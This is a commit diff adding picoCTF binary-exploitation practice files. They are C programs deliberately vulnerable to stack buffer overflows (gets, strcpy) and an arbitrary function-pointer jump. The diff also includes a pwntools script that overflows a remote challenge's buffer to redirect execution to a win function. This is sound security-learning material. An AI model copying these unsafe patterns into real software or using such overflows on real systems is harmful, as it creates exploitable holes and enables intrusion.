some more playlist stuff

mochis_tale/binary_exploitation/buffer_overflow_0/flag.txt

@@ -0,0 +1 @@
+flagFLAG

mochis_tale/binary_exploitation/buffer_overflow_0/vuln.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+
+#define FLAGSIZE_MAX 64
+
+char flag[FLAGSIZE_MAX];
+
+void sigsegv_handler(int sig) {
+  printf("%s\n", flag);
+  fflush(stdout);
+  exit(1);
+}
+
+void vuln(char *input){
+  char buf2[16];
+  strcpy(buf2, input);
+}
+
+int main(int argc, char **argv){
+  
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+  
+  fgets(flag,FLAGSIZE_MAX,f);
+  signal(SIGSEGV, sigsegv_handler); // Set up signal handler
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+
+  printf("Input: ");
+  fflush(stdout);
+  char buf1[100];
+  gets(buf1); 
+  vuln(buf1);
+  printf("The program will exit now\n");
+  return 0;
+}

mochis_tale/binary_exploitation/buffer_overflow_1/sol.py

@@ -0,0 +1,11 @@
+#!/home/maxime/.pyvenv/bin/python3
+from pwn import *
+
+conn = remote("saturn.picoctf.net", 63154)
+
+conn.recvline()
+conn.sendline(b'0'*44 + b'\xf6\x91\x04\x08')
+conn.interactive()
+
+conn.close()
+

mochis_tale/binary_exploitation/buffer_overflow_1/vuln.c

@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+

mochis_tale/binary_exploitation/local_target/local-target.c

@@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+
+
+int main(){
+  FILE *fptr;
+  char c;
+
+  char input[16];
+  int num = 64;
+  
+  printf("Enter a string: ");
+  fflush(stdout);
+  gets(input);
+  printf("\n");
+  
+  printf("num is %d\n", num);
+  fflush(stdout);
+  
+  if( num == 65 ){
+    printf("You win!\n");
+    fflush(stdout);
+    // Open file
+    fptr = fopen("flag.txt", "r");
+    if (fptr == NULL)
+    {
+        printf("Cannot open file.\n");
+        fflush(stdout);
+        exit(0);
+    }
+
+    // Read contents from file
+    c = fgetc(fptr);
+    while (c != EOF)
+    {
+        printf ("%c", c);
+        c = fgetc(fptr);
+    }
+    fflush(stdout);
+
+    printf("\n");
+    fflush(stdout);
+    fclose(fptr);
+    exit(0);
+  }
+  
+  printf("Bye!\n");
+  fflush(stdout);
+}

mochis_tale/binary_exploitation/picker_4/picker-IV.c

@@ -0,0 +1,49 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <unistd.h>
+
+
+void print_segf_message(){
+  printf("Segfault triggered! Exiting.\n");
+  sleep(15);
+  exit(SIGSEGV);
+}
+
+int win() {
+  FILE *fptr;
+  char c;
+
+  printf("You won!\n");
+  // Open file
+  fptr = fopen("flag.txt", "r");
+  if (fptr == NULL)
+  {
+      printf("Cannot open file.\n");
+      exit(0);
+  }
+
+  // Read contents from file
+  c = fgetc(fptr);
+  while (c != EOF)
+  {
+      printf ("%c", c);
+      c = fgetc(fptr);
+  }
+
+  printf("\n");
+  fclose(fptr);
+}
+
+int main() {
+  signal(SIGSEGV, print_segf_message);
+  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
+
+  unsigned int val;
+  printf("Enter the address in hex to jump to, excluding '0x': ");
+  scanf("%x", &val);
+  printf("You input 0x%x\n", val);
+
+  void (*foo)(void) = (void (*)())val;
+  foo();
+}